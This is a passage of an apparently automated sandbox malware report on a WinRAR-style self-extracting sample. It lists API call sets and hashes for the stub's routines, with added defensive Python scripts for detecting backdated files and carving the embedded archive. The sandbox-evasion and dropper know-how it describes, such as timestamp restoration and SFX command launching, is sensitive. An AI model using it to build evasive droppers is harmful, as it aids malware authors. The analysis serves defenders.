                • Instruction Fuzzy Hash: 4BF0FFB1D00209ABDB10AF9AD8499EFFFFCEF95705F00415AE914E2240DBB45649CFA1

Control-flow Graph

Control-flow graph 939: entry 004D99B0, basic blocks 004D99B0-004D9B1E (graph nodes 939-969). External calls inside the graph: CreateFileW (block 004D9A39, retried in block 004D9A7D), GetLastError (blocks 004D9A59 and 004D9A7D) and SetFileTime (block 004D9AC7); the remaining edges lead to internal subroutines (004EE360, 004D70BF, 004DB66C, 004DFE56). The rendered graph is not reproduced in this extract.
                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,004D78AD,?,00000005,?,00000011), ref: 004D9A4C
                • GetLastError.KERNEL32(?,?,004D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004D9A59
                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,004D78AD,?,00000005,?), ref: 004D9A8E
                • GetLastError.KERNEL32(?,?,004D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004D9A96
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,004D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004D9ADB
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: 4cceb010ef4f3c9ec4e3a025c8df30c5458650e284499845f0855aec91100e80
                • Instruction ID: 0e408a85887a11a77ce2a5d67c2aec8e13372b952bb2f03e27b80a5bbe6dc93f
                • Opcode Fuzzy Hash: 4cceb010ef4f3c9ec4e3a025c8df30c5458650e284499845f0855aec91100e80
                • Instruction Fuzzy Hash: D24144715447866FE7209B20CC19BDBBBD4BB01324F10071BF9A4D23D0E778AD888B99
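
The routine above opens a file with CreateFileW (retrying once after GetLastError) and then calls SetFileTime on it, which is the pattern of an extractor restoring the timestamp stored in its archive onto the file it has just written. The report does not show the timestamp values, so treat the following as an inference from the API sequence: files this stub drops can carry a last-write time that predates the infection by years, while the filesystem creation time still records the moment of extraction. The script below is an added triage example (not code from the report, from Joe Sandbox or from WinRAR) that flags files with that inverted ordering; the directory argument and the 60-second tolerance are assumptions, and the test data it builds is constructed.

```python
"""Flag files whose last-write time is older than their creation time.

Added triage example, not code from the sandbox report. A file is normally
written at or after it is created, so mtime < creation time is the signature
of a modification time restored from an archive (SetFileTime after extraction)
or otherwise forged. Directory and tolerance are assumptions."""
import os
import time
from dataclasses import dataclass
from pathlib import Path
from typing import List


@dataclass
class BackdatedFile:
    path: str
    created: float       # creation/birth time where the platform exposes it
    modified: float      # st_mtime, the field an extractor rewrites
    gap_seconds: float   # how far mtime lies before the creation time


def creation_time(st: os.stat_result) -> float:
    """Birth time on Windows (Python 3.12+), macOS and BSD. Fallback: st_ctime,
    which is the creation time on Windows before 3.12 and the inode change time
    on Linux; the latter is still bumped by the extractor's own utime/SetFileTime,
    so the comparison remains meaningful there."""
    return getattr(st, "st_birthtime", None) or st.st_ctime


def find_backdated(root: str, tolerance: float = 60.0) -> List[BackdatedFile]:
    """Walk `root` and return files whose mtime lies more than `tolerance`
    seconds before their creation time, largest gap first."""
    hits = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        st = p.stat()
        created = creation_time(st)
        gap = created - st.st_mtime
        if gap > tolerance:
            hits.append(BackdatedFile(str(p), created, st.st_mtime, gap))
    return sorted(hits, key=lambda h: h.gap_seconds, reverse=True)


def backdate(path: str, seconds_ago: float) -> None:
    """Mimic the extractor: rewrite only the access/modification times
    (os.utime is the POSIX analogue of SetFileTime's lpLastWriteTime)."""
    past = time.time() - seconds_ago
    os.utime(path, (past, past))


if __name__ == "__main__":
    import sys
    for hit in find_backdated(sys.argv[1] if len(sys.argv) > 1 else "."):
        days = hit.gap_seconds / 86400
        print(f"{hit.path}: mtime {time.ctime(hit.modified)} is {days:.0f} days "
              f"before creation {time.ctime(hit.created)}")
```

Point it at the directory the sandbox lists as the drop location. On NTFS, confirm a hit against the $FILE_NAME timestamps in the MFT record, which SetFileTime does not touch, before treating the modification time as evidence of when the file was actually written.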

Control-flow Graph

Control-flow graph 998: entry 004EAC74, basic blocks 004EAC74-004EACCC (graph nodes 998-1002). A single message-pump pass: PeekMessageW (block 004EAC74), then GetMessageW (block 004EAC8F), IsDialogMessageW (block 004EACA5) and, if the message was not consumed by the dialog, TranslateMessage and DispatchMessageW (block 004EACB4). The rendered graph is not reproduced in this extract.
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004EAC85
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004EAC96
                • IsDialogMessageW.USER32(00010418,?), ref: 004EACAA
                • TranslateMessage.USER32(?), ref: 004EACB8
                • DispatchMessageW.USER32(?), ref: 004EACC2
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: 6e31b63923e7c6279c5fb6aeedb7b0e364ecdb3c37379c875eaf5f143905ea88
                • Instruction ID: bd7518d3f97c0d1281c9ecab26545a622208638664c5b1c2636a035bcccf1864
                • Opcode Fuzzy Hash: 6e31b63923e7c6279c5fb6aeedb7b0e364ecdb3c37379c875eaf5f143905ea88
                • Instruction Fuzzy Hash: BCF01D71902129AB8B249BE2AC4CDEB7F6CEF15251B404415F405D3210EB28E40DD7B1

Control-flow Graph

Control-flow graph 1003: entry 004EA2C7, basic blocks 004EA2C7-004EA31F (graph nodes 1003-1011). External calls inside the graph: GetClassNameW (block 004EA2C7), FindWindowExW (block 004EA2FF, reached after the string compare in subroutine 004E17AC) and SHAutoComplete (block 004EA312). The rendered graph is not reproduced in this extract.
                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 004EA2DE
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 004EA315
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 004EA305
                Strings
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT
                • API String ID: 4243998846-3080729518
                • Opcode ID: a9d116d2aebf566a2d23bb6ecaa1c9f4531d6de311d251198ec74c9a9eebf041
                • Instruction ID: 3c7598f7319c830a46de7829745a8ade80eea17146c279da5492e90f027b77e5
                • Opcode Fuzzy Hash: a9d116d2aebf566a2d23bb6ecaa1c9f4531d6de311d251198ec74c9a9eebf041
                • Instruction Fuzzy Hash: 5EF02732A0162877E7305626AC0DFDB77AC9F46B02F040057BE04E3280D764AD59C6FA

Control-flow Graph

Control-flow graph 1012: entry 004ED287, basic blocks 004ED287-004ED2E3 (graph nodes 1012-1023). External calls inside the graph: SetEnvironmentVariableW in the entry block (004ED287-004ED2B2, after subroutine 004EE360) and again in block 004ED2D3 after the loop through subroutine 004DFCF1. The rendered graph is not reproduced in this extract.
                APIs
                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ED29D
                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ED2D9
                Strings
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 2aef212e754318d5e9b38c4543d8bf88e4ec224d9b42f828648b827fa7a89f97
                • Instruction ID: 1f6420f2c7a1762f6da58e2f00c0b9d9aca88cdc0ee41b673e464b87232fcf18
                • Opcode Fuzzy Hash: 2aef212e754318d5e9b38c4543d8bf88e4ec224d9b42f828648b827fa7a89f97
                • Instruction Fuzzy Hash: FFF02771800228E2D7202F928C19ABF7B5CBF18B42B000097FD8552241D628CC40DAF9
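
The two strings this routine writes, sfxcmd and sfxpar, are the names the WinRAR SFX module documents for the environment variables it exports to the commands it launches, so this function belongs to the self-extractor stub rather than to the payload it carries. For triage that matters: the archive sits appended after the stub's PE image, can be found by its signature, and can be listed with unrar or 7-Zip without ever executing the stub. The script below is an added example (not code from the report, from Joe Sandbox or from WinRAR); the header layout and flag bits are from the public RAR format description, the sample bytes are constructed, and the RAR4 header CRC is deliberately not validated.

```python
"""Locate the RAR archive a WinRAR-style SFX stub carries after its PE image.

Added triage example, not code from the sandbox report or from WinRAR.
Format constants follow the public RAR specification; SAMPLE is a constructed
stand-in for an SFX, and the RAR4 header CRC is not checked."""
import struct
from typing import Optional

RAR_MARK = b"Rar!\x1a\x07"   # common prefix of the RAR4 and RAR5 signatures

# RAR 1.5-4.x MAIN_HEAD (HEAD_TYPE 0x73) flag bits worth reporting in triage.
MHD_FLAGS = {
    0x0002: "comment",    # archive comment present: where an SFX script is stored
    0x0008: "solid",
    0x0080: "password",   # header encryption (-hp): names hidden until unlocked
}


def find_rar_overlay(data: bytes) -> Optional[dict]:
    """Return offset and format of the first RAR signature in `data`, or None.
    Skips stray 'Rar!' strings not followed by a valid version byte."""
    pos = 0
    while True:
        off = data.find(RAR_MARK, pos)
        if off == -1:
            return None
        tail = data[off + 6:off + 8]
        if tail[:1] == b"\x00":            # Rar!\x1a\x07\x00      -> RAR 1.5-4.x
            return {"offset": off, "format": "rar4", "magic_len": 7}
        if tail == b"\x01\x00":            # Rar!\x1a\x07\x01\x00  -> RAR5
            return {"offset": off, "format": "rar5", "magic_len": 8}
        pos = off + 1


def parse_rar4_main_header(data: bytes, archive_off: int) -> dict:
    """Decode the MAIN_HEAD that follows the 7-byte RAR4 mark header.
    Layout, little-endian: HEAD_CRC u16, HEAD_TYPE u8, HEAD_FLAGS u16, HEAD_SIZE u16."""
    hdr = archive_off + 7
    _crc, head_type, flags, size = struct.unpack_from("<HBHH", data, hdr)
    if head_type != 0x73:
        raise ValueError(f"expected MAIN_HEAD 0x73 at 0x{hdr:x}, got 0x{head_type:02x}")
    return {
        "flags": flags,
        "attributes": sorted(n for bit, n in MHD_FLAGS.items() if flags & bit),
        "first_block": hdr + size,     # next header block, normally a FILE_HEAD
    }


def carve_archive(data: bytes, info: dict) -> bytes:
    """Bytes from the signature to EOF: a standalone archive unrar/7z can list."""
    return data[info["offset"]:]


# Constructed sample: fake stub bytes, then a RAR4 archive whose MAIN_HEAD is
# flagged solid + comment. A real SFX stub is far larger; the layout is the same.
STUB = b"MZ" + b"\x00" * 62 + b"stub code, not a real PE" + b"\x00" * 32
MAIN_HEAD = struct.pack("<HBHH", 0, 0x73, 0x0008 | 0x0002, 13) + b"\x00" * 6
SAMPLE = STUB + b"Rar!\x1a\x07\x00" + MAIN_HEAD + b"\x00" * 16

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    info = find_rar_overlay(data)
    if info is None:
        print("no RAR signature found")
    else:
        print(f"{info['format']} archive at offset 0x{info['offset']:x}")
        if info["format"] == "rar4":
            print(parse_rar4_main_header(data, info["offset"]))
        if len(sys.argv) > 2:
            with open(sys.argv[2], "wb") as out:
                out.write(carve_archive(data, info))
```

Run it with the sample path and an output path to carve the archive; `unrar l` on the carved file prints the archive comment, which is where a WinRAR SFX keeps its script (Setup=, Silent=, TempMode and similar directives), so the post-extraction command can be read before anything is run. A "password" attribute on a RAR4 header, or a RAR5 archive whose listing fails, means the names are encrypted and the comment is all you get statically.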

Control-flow Graph

Control-flow graph 1024: entry 004D984E, basic blocks 004D984E-004D98E2 (graph nodes 1024-1044). External calls inside the graph: GetStdHandle (block 004D985C), ReadFile (block 004D9867) and GetLastError (blocks 004D98A8 and 004D98C7); on the retry paths the function calls itself again (block 004D9896, call 004D984E). The rendered graph is not reproduced in this extract.
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 004D985E
                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 004D9876
                • GetLastError.KERNEL32 ref: 004D98A8
                • GetLastError.KERNEL32 ref: 004D98C7
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 177d4d1503f9d3bf78008d96e36694c35a6ba3002c10bc05767852318d4dbb0b
                • Instruction ID: cfc5fe5e6cafe386a898bb0f2fd1cee44395e50ebd6c72a064f9e3948790ec03
                • Opcode Fuzzy Hash: 177d4d1503f9d3bf78008d96e36694c35a6ba3002c10bc05767852318d4dbb0b
                • Instruction Fuzzy Hash: 6411A330920204EFDB206B51C824A6A77ACEB12B30F14852BF82AC6780D7799D44BF5A
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004F3713,00000000,00000000,?,004FA49B,004F3713,00000000,00000000,00000000,?,004FA698,00000006,FlsSetValue), ref: 004FA526
                • GetLastError.KERNEL32(?,004FA49B,004F3713,00000000,00000000,00000000,?,004FA698,00000006,FlsSetValue,00507348,00507350,00000000,00000364,?,004F9077), ref: 004FA532
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004FA49B,004F3713,00000000,00000000,00000000,?,004FA698,00000006,FlsSetValue,00507348,00507350,00000000), ref: 004FA540
Memory Dump Source
• Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true (associated dumps identical to the first entry above)
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 068442c59e93b18755235849295530e7474b3707e65eedc4baeee4e830e679e4
                • Instruction ID: db09af8e9e44423a873e4cb35b9b49d7cc4b851721f6b13a672033bdd0e338f7
                • Opcode Fuzzy Hash: 068442c59e93b18755235849295530e7474b3707e65eedc4baeee4e830e679e4
                • Instruction Fuzzy Hash: C0014C7261122ABBC7208B689C44A7B775CAF157A17140122FA0ED3340D724D914C6E5
                APIs
                  • Part of subcall function 004F8FA5: GetLastError.KERNEL32(?,00510EE8,004F3E14,00510EE8,?,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F8FA9
                  • Part of subcall function 004F8FA5: _free.LIBCMT ref: 004F8FDC
                  • Part of subcall function 004F8FA5: SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F901D
                  • Part of subcall function 004F8FA5: _abort.LIBCMT ref: 004F9023
                  • Part of subcall function 004FB2AE: _abort.LIBCMT ref: 004FB2E0
                  • Part of subcall function 004FB2AE: _free.LIBCMT ref: 004FB314
                  • Part of subcall function 004FAF1B: GetOEMCP.KERNEL32(00000000,?,?,004FB1A5,?), ref: 004FAF46
                • _free.LIBCMT ref: 004FB200
                • _free.LIBCMT ref: 004FB236
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID: P
                • API String ID: 2991157371-2113778011
                • Opcode ID: 22f03601f5a07063a8c3224183dfd34de5c294aa60315832560ba2ed265a5b82
                • Instruction ID: b51014ef54c1a0bb09e16704546399973203ffc341d5c3ee54498d06b8d6a3ca
                • Opcode Fuzzy Hash: 22f03601f5a07063a8c3224183dfd34de5c294aa60315832560ba2ed265a5b82
                • Instruction Fuzzy Hash: 8131043190020CAFDB10EFAAC945A7E77E5EF02324F25409FEA149B391EB795D41CB99
                APIs
                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,004DCC94,00000001,?,?,?,00000000,004E4ECD,?,?,?), ref: 004D9F4C
                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,004E4ECD,?,?,?,?,?,004E4972,?), ref: 004D9F8E
                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,004DCC94,00000001,?,?), ref: 004D9FB8
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: b7f22b2dd6d9ab034c5b2b8f3e999f17b9be60c213513f474a30ffe0895be8a8
                • Instruction ID: 48d200befe058d7d82262bf155faa54736c6b922600a89ffc735e215da9081a4
                • Opcode Fuzzy Hash: b7f22b2dd6d9ab034c5b2b8f3e999f17b9be60c213513f474a30ffe0895be8a8
                • Instruction Fuzzy Hash: 813122712083059BDF109F24D968B6BBBA8EB91710F04461FF945DB381C778DC49CBAA
                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA22E
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA261
                • GetLastError.KERNEL32(?,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA27E
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CreateDirectory$ErrorLast
                • String ID:
                • API String ID: 2485089472-0
                • Opcode ID: 249b123380ea3ffe273ccd819fa0eeede973d8b384624b4cf444cfe59972530d
                • Instruction ID: 2dc599cea2da9b65605a480184a30cdb0012e9fc47582ffb000afd1ce34b91ca
                • Opcode Fuzzy Hash: 249b123380ea3ffe273ccd819fa0eeede973d8b384624b4cf444cfe59972530d
                • Instruction Fuzzy Hash: FA01C031181214A6DB22ABA75C29BEF334CAF07741F08049BF800D5351DB6ECA6186AF
                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004FB019
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: 9ab46ad1f82b1e900850ae4635b2d2b470dc4e371fa40eac80f8c2ee03274e6d
                • Instruction ID: eb7619f2bb6d45c1f82b68eaba85b082ddbc958c012d79d57e3551f24ae4efdb
                • Opcode Fuzzy Hash: 9ab46ad1f82b1e900850ae4635b2d2b470dc4e371fa40eac80f8c2ee03274e6d
                • Instruction Fuzzy Hash: CC41387050434C9EDF218E24CD94AF7BBADDB06304F2404EEE69A87242D3399E46CFA4
                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 004FA79D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: 65972aec9095c75d0690cfe3ae1a5ad844eb4ccbc55de7d400e298eb9e6be471
                • Instruction ID: 6412628d6d1340e0e97b26ee58dd15eaa9c918556138cef222d47ba6f70193f7
                • Opcode Fuzzy Hash: 65972aec9095c75d0690cfe3ae1a5ad844eb4ccbc55de7d400e298eb9e6be471
                • Instruction Fuzzy Hash: 6C01027250020DBBCF126FA1DD02DEE3FA6EB18750F044555FE1826160CA369931EB96
                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,004F9D2F), ref: 004FA715
                Strings
                • InitializeCriticalSectionEx, xrefs: 004FA6E5
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: 35c39edfdc69cfe0e773464c78f9f4536e9cdee5c2fb0939c65099a143acc14c
                • Instruction ID: 89c98401da7ec2ea40c3fc10bca870f7fcfd22294e9dc60c0efda6ebc6314021
                • Opcode Fuzzy Hash: 35c39edfdc69cfe0e773464c78f9f4536e9cdee5c2fb0939c65099a143acc14c
                • Instruction Fuzzy Hash: 3DF0E971A4521CBBCB116F51DC05CAE7FA5FF18720B008455FD0916260DB729E20FB95
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: e94cd7ec4ece65866ed635a2685b571195119138143fa8e2aa052309e4932db2
                • Instruction ID: 9819cc6049843fb6983d3bd0d4a56db7caedd11b058e9f8808a50cb2db6da3be
                • Opcode Fuzzy Hash: e94cd7ec4ece65866ed635a2685b571195119138143fa8e2aa052309e4932db2
                • Instruction Fuzzy Hash: 23E0ABB0B4522CBFD3246B659C02CBEBF54EF29710B00011AFC0817280DE751E10E6DA
                APIs
                • try_get_function.LIBVCRUNTIME ref: 004F32AF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: try_get_function
                • String ID: FlsAlloc
                • API String ID: 2742660187-671089009
                • Opcode ID: 89988395038a2b93396e6c6996b9e679438d25219dcec2af2ba62dc5349e927e
                • Instruction ID: 0c2e99a3047ddd245806daf7dadcc82edabe4e0ddbe3322cbe887563659dc219
                • Opcode Fuzzy Hash: 89988395038a2b93396e6c6996b9e679438d25219dcec2af2ba62dc5349e927e
                • Instruction Fuzzy Hash: 65D02B31780A396AC51036C66C039BF7E449701FF7F450253FF081A2C2A466490085DD
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EE20B
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
